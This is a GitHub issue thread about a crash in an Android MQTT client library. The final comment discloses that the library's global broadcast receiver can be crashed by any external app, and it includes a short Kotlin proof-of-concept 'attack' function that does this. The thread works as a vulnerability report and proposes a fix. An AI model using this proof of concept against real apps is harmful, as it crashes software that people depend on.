### ISSUE TITLE
[Crash] java.io.InvalidClassException

### ISSUE THREAD

**Issue by jarryleo** [hannesa2/paho.mqtt.android#490] opened 2023-08-03 06:33 UTC
version: 4.0-beta2 

Did you fix it in version 4.0?

java.io.InvalidClassException

org.eclipse.paho.client.mqttv3.MqttException; local class incompatible: stream classdesc serialVersionUID = 300, local class serialVersionUID = 8326345380251544527
java.lang.RuntimeException:Error receiving broadcast Intent { act=.callbackToActivity.v0 flg=0x80010 (has extras) } in info.mqtt.android.service.MqttAndroidClient@8c3d1d6
2
android.app.LoadedApk$ReceiverDispatcher$Args.lambda$getRunnable$0$LoadedApk$ReceiverDispatcher$Args(LoadedApk.java:1793)
3
......
4
Caused by:
5
java.io.InvalidClassException:org.eclipse.paho.client.mqttv3.MqttException; local class incompatible: stream classdesc serialVersionUID = 300, local class serialVersionUID = 8326345380251544527
6
java.io.ObjectStreamClass.initNonProxy(ObjectStreamClass.java:624)
7
java.io.ObjectInputStream.readNonProxyDesc(ObjectInputStream.java:1741)
8
java.io.ObjectInputStream.readClassDesc(ObjectInputStream.java:1622)
9
java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:1900)
10
java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1440)
11
java.io.ObjectInputStream.readObject(ObjectInputStream.java:428)
12
android.os.Parcel.readSerializable(Parcel.java:3554)
13
android.os.Parcel.readValue(Parcel.java:3324)
14
android.os.Parcel.readArrayMapInternal(Parcel.java:3674)
15
android.os.BaseBundle.initializeFromParcelLocked(BaseBundle.java:292)
16
android.os.BaseBundle.unparcel(BaseBundle.java:236)
17
android.os.BaseBundle.getString(BaseBundle.java:1196)
18
info.mqtt.android.service.MqttAndroidClient.onReceive(MqttAndroidClient.kt:20)
19
android.app.LoadedApk$ReceiverDispatcher$Args.lambda$getRunnable$0$LoadedApk$ReceiverDispatcher$Args(LoadedApk.java:1770)
20
android.app.LoadedApk$ReceiverDispatcher$Args$$ExternalSyntheticLambda0.run(Unknown Source:2)
21
android.os.Handler.handleCallback(Handler.java:938)
22
android.os.Handler.dispatchMessage(Handler.java:99)
23
android.os.Looper.loopOnce(Looper.java:233)
24
android.os.Looper.loop(Looper.java:344)
25
android.app.ActivityThread.main(ActivityThread.java:8205)
26
java.lang.reflect.Method.invoke(Native Method)
27
com.android.internal.os.RuntimeInit$MethodAndArgsCaller.run(RuntimeInit.java:589)
28
com.android.internal.os.ZygoteInit.main(ZygoteInit.java:1071)

**Comment by hannesa2** [comment] 2023-08-03 06:56
I don't know this. On the first view, it looks like a local issue on your side. 
I can only fix stuff, which I can reproduce (and see). You could helping me with this.

Btw, formatting a call stack is more useful

**Comment by jarryleo** [comment] 2023-08-03 07:28
Thank you for your response. I only have this stack information. Not all devices are experiencing errors, only a few of them. This is the collected customer device information, and I have no way to debug remotely.

**Comment by hannesa2** [comment] 2023-08-03 07:56
> and I have no way to debug remotely.

Me too.

It must be one of the two `.getString() `
<img width="803" alt="image" src="https://github.com/hannesa2/paho.mqtt.android/assets/3314607/2213686a-e728-4fdc-a74e-c81942ef3e99">

So it looks like a issue for specific device/manufacture. I see no chance for me to solve it without reproduce it.
So i close the issue to avoid some dead issues, but when you know me, you can reopen it again

**Closed by hannesa2** 2023-08-03 07:56 UTC
Labels: A sample is required

**Comment by jarryleo** [comment] 2023-08-04 06:56
Hello, I have found the cause of the bug from yesterday. It is possible that another app is also using your library but with a different version of MQTT, which leads to the crash. It could also be a malicious attack.
In your library, there is a broadcast that is not isolated to the app, so external apps can also receive it. If an external app sends a broadcast with a custom MqttException, all apps using your library will crash.
I have created a demo app and sent the following broadcast, and as a result, all apps using this library crashed:
I suggest that you avoid using global broadcasts in your library and instead use local broadcasts.
```
//custom MqttException
class MqttException(message: String?) : Exception(message) {
    companion object {
        private const val serialVersionUID = 20230804L
    }
}

fun attack(context: Context) {
    val callbackIntent = Intent(".callbackToActivity.v0")
    val bundle = Bundle()
    bundle.putSerializable(".exception", MqttException("mqttAttack"))
    callbackIntent.putExtras(bundle)
    context.sendBroadcast(callbackIntent)
}
```
